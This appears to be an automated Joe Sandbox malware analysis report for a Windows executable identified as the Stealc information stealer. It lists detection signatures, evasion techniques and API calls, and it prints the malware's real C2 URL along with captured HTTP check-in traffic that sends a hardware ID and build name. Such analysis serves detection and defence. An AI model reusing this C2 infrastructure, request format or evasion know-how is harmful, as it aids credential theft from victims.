Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544215
MD5:1f9bbfe42e611b314849010fb1bbe51c
SHA1:5a25bc214ecb669fa11dc91c84c19e5d238125ba
SHA256:0a348ff9b393249df44a77c30c8cef6cacc54f9f6d1fcf34bfb195cef3e455b4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1F9BBFE42E611B314849010FB1BBE51C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1769403587.0000000005850000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 4408JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 4408JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ea0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T04:01:10.465335+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.ea0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206/6c4adf523b719729.php=Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 40%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00EB9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00EA72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00EAA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00EAA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00EAC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EB40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EAE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EB47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EAF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EADB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EB4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EB3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EABE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EAEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EADF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="hwid"0ED90342B485302599741------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="build"tale------AAAKEBGDAFHIIDHIIECF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00EA62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 44 39 30 33 34 32 42 34 38 35 33 30 32 35 39 39 37 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="hwid"0ED90342B485302599741------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="build"tale------AAAKEBGDAFHIIDHIIECF--
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1812029198.0000000001C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1812029198.0000000001BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%.e
                Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
                Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=
                Source: file.exe, 00000000.00000002.1812029198.0000000001C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa~
                Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/hb5
                Source: file.exe, 00000000.00000002.1812029198.0000000001C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE00980_2_00EE0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB1980_2_00EFB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED21380_2_00ED2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C3670_2_0124C367
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE42880_2_00EE4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E2580_2_00F0E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FC2140_2_012FC214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1D39E0_2_00F1D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F02D60_2_012F02D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2B3080_2_00F2B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FA54D0_2_012FA54D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FE5C10_2_012FE5C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE45A80_2_00EE45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0D5A80_2_00F0D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC45730_2_00EC4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE5440_2_00ECE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F296FD0_2_00F296FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE66C80_2_00EE66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012FF7140_2_012FF714
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012EE76A0_2_012EE76A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012507B60_2_012507B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1A6480_2_00F1A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F167990_2_00F16799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFD7200_2_00EFD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F8D60_2_00F0F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F596A0_2_012F596A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFB8A80_2_00EFB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F39620_2_012F3962
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF98B80_2_00EF98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF48680_2_00EF4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012839FE0_2_012839FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012608700_2_01260870
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E1B250_2_012E1B25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A2B3E0_2_012A2B3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01302B6C0_2_01302B6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D6B7F0_2_011D6B7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012ECB4B0_2_012ECB4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D2B5A0_2_012D2B5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F8A0E0_2_012F8A0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14BA80_2_00F14BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F10B880_2_00F10B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F1DA40_2_012F1DA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1AC280_2_00F1AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4DC80_2_00EF4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF5DB90_2_00EF5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFBD680_2_00EFBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED1D780_2_00ED1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0AD380_2_00F0AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11EE80_2_00F11EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136AF7E0_2_0136AF7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012F6F550_2_012F6F55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE8E780_2_00EE8E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EA4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: oxrzanjf ZLIB complexity 0.9948995569099611
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EB9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00EB3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0VIKGQCP.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 40%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2149888 > 1048576
                Source: file.exeStatic PE information: Raw size of oxrzanjf is bigger than: 0x100000 < 0x1a1e00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1769403587.000000000587B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ea0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;oxrzanjf:EW;lnkngpyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;oxrzanjf:EW;lnkngpyb:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EB9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2111be should be: 0x20e0e3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: oxrzanjf
                Source: file.exeStatic PE information: section name: lnkngpyb
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013EB13B push 66D45914h; mov dword ptr [esp], edi0_2_013EB1A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECA0DC push eax; retf 0_2_00ECA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A311C push esi; mov dword ptr [esp], edx0_2_012A3165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A311C push 6BE129EAh; mov dword ptr [esp], ebx0_2_012A318E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A311C push edx; mov dword ptr [esp], ebx0_2_012A31F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A311C push ecx; mov dword ptr [esp], ebp0_2_012A3207
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A311C push 49239DC7h; mov dword ptr [esp], edx0_2_012A3239
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132215D push ebx; mov dword ptr [esp], ecx0_2_01322181
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132215D push ebx; mov dword ptr [esp], ecx0_2_013221CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132215D push edx; mov dword ptr [esp], eax0_2_01322236
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01421132 push eax; mov dword ptr [esp], 00000004h0_2_0142121A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push 2B3DE0AEh; mov dword ptr [esp], edx0_2_0128F1F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push edx; mov dword ptr [esp], 7FF773C3h0_2_0128F1F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push 10720CBEh; mov dword ptr [esp], edi0_2_0128F254
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push 375BFACDh; mov dword ptr [esp], edi0_2_0128F2A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push ecx; mov dword ptr [esp], ebp0_2_0128F2EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push edi; mov dword ptr [esp], ecx0_2_0128F316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push 79D7EA9Bh; mov dword ptr [esp], edi0_2_0128F31E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0128F1E9 push ecx; mov dword ptr [esp], edi0_2_0128F3B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013841E3 push 6DBE8AB2h; mov dword ptr [esp], ebp0_2_0138422C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136F1C6 push ebp; mov dword ptr [esp], eax0_2_0136F1E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECA106 push eax; retf 0_2_00ECA119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013EE33B push 20509C29h; mov dword ptr [esp], edx0_2_013EE3D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push eax; mov dword ptr [esp], ecx0_2_0124C391
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push 2D3384FBh; mov dword ptr [esp], ebp0_2_0124C3A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push ecx; mov dword ptr [esp], eax0_2_0124C3AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push eax; mov dword ptr [esp], 1F65BE3Ch0_2_0124C3DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push esi; mov dword ptr [esp], ebx0_2_0124C3E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124C367 push 5769B6CEh; mov dword ptr [esp], ebx0_2_0124C40A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01398355 push 4C9A1A3Ch; mov dword ptr [esp], edi0_2_0139837C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0132E391 push 0BED477Dh; mov dword ptr [esp], edx0_2_0132E351
